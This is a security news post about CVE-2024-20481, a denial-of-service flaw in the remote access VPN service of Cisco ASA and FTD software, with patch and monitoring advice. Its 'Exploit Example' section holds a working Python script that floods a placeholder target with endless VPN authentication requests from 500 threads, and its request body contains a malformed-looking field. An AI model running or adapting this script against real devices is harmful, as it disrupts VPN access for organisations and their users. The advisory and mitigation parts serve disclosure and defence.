CVE CyberSecurity Database News

CVE-2024-20481 - Critical Vulnerability in Cisco RAVPN Services: Denial of Service Attack Risk

Poster -

A critical vulnerability has been identified in the Remote Access VPN (RAVPN) service of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software (CVE-2024-20481). This vulnerability exposes affected devices to potential Denial of Service (DoS) attacks by unauthenticated, remote attackers. As a result, essential services on the affected devices may become unavailable, disrupting VPN operations and possibly necessitating a device reload.

Vulnerability Details

This vulnerability arises from resource exhaustion in the RAVPN service. An attacker can exploit it by sending a large number of VPN authentication requests to the target device. A successful exploitation can cause resources to be exhausted, resulting in a denial of service for the RAVPN functionality on the affected device. It is important to note that services unrelated to VPN are not affected by this vulnerability.

Cisco Talos, the cybersecurity intelligence arm of Cisco Systems, has published an insightful blog post outlining large-scale brute-force attacks targeting VPNs and SSH services using common login credentials. The post can be found here: Large-scale brute-force activity targeting VPNs, SSH services with commonly used login credentials

Exploit Example

An example of an exploit code snippet that demonstrates the vulnerability is provided below. This is for educational purposes and understanding the nature of this vulnerability.

import requests
import random
from threading import Thread

TARGET = "https://TARGET_IP/";
USERNAME = "username"
PASSWORD = "password"

def spoof_authentication_request():

    headers = {
        'User-Agent': 'AnyConnect Linux_64 4.9.05042',
        'Content-Type': 'application/x-www-form-urlencoded'
    }

    data = f"tunnel-group={random.choice(range(65535))}&username={USERNAME}&password={PASSWORD}&url_redirect=&group_list=%22%3E%3Cgroup_list%22%2C88965}&preferWebSoftwareUpgrade=&resource_url=&lang_code=en"

    try:
        response = requests.post(TARGET, headers=headers, data=data, timeout=5)
    except requests.exceptions.RequestException as e:
        return

def exploit():
    while True:
        spoof_authentication_request()

for _ in range(500):
    t = Thread(target=exploit)
    t.start()

Mitigations and Next Steps

It is highly recommended that users and administrators of affected software update to the latest available patch from Cisco to address this vulnerability. Cisco has released software updates that address this vulnerability for both ASA and FTD. Please refer to the following links for the relevant Security Advisories:

- Cisco Adaptive Security Appliance Software and Cisco Firepower Threat Defense Software Remote Access VPN Denial of Service Vulnerability
- Workarounds: No workarounds available

In addition to applying available patches, administrators should monitor their network logs for any unusual VPN authentication traffic and implement strong access controls, such as unique usernames and complex passwords, to minimize the risk of successful brute-force attacks.

Conclusion

The CVE-2024-20481 vulnerability in Cisco's RAVPN service poses a significant risk to affected devices, as it can lead to a denial of service for the VPN functionality. Ensuring that devices are updated with the latest patches and implementing proper access controls can help mitigate this risk and maintain the integrity and availability of VPN services.

Timeline

Published on: 10/23/2024 18:15:11 UTC
Last modified on: 10/29/2024 17:47:44 UTC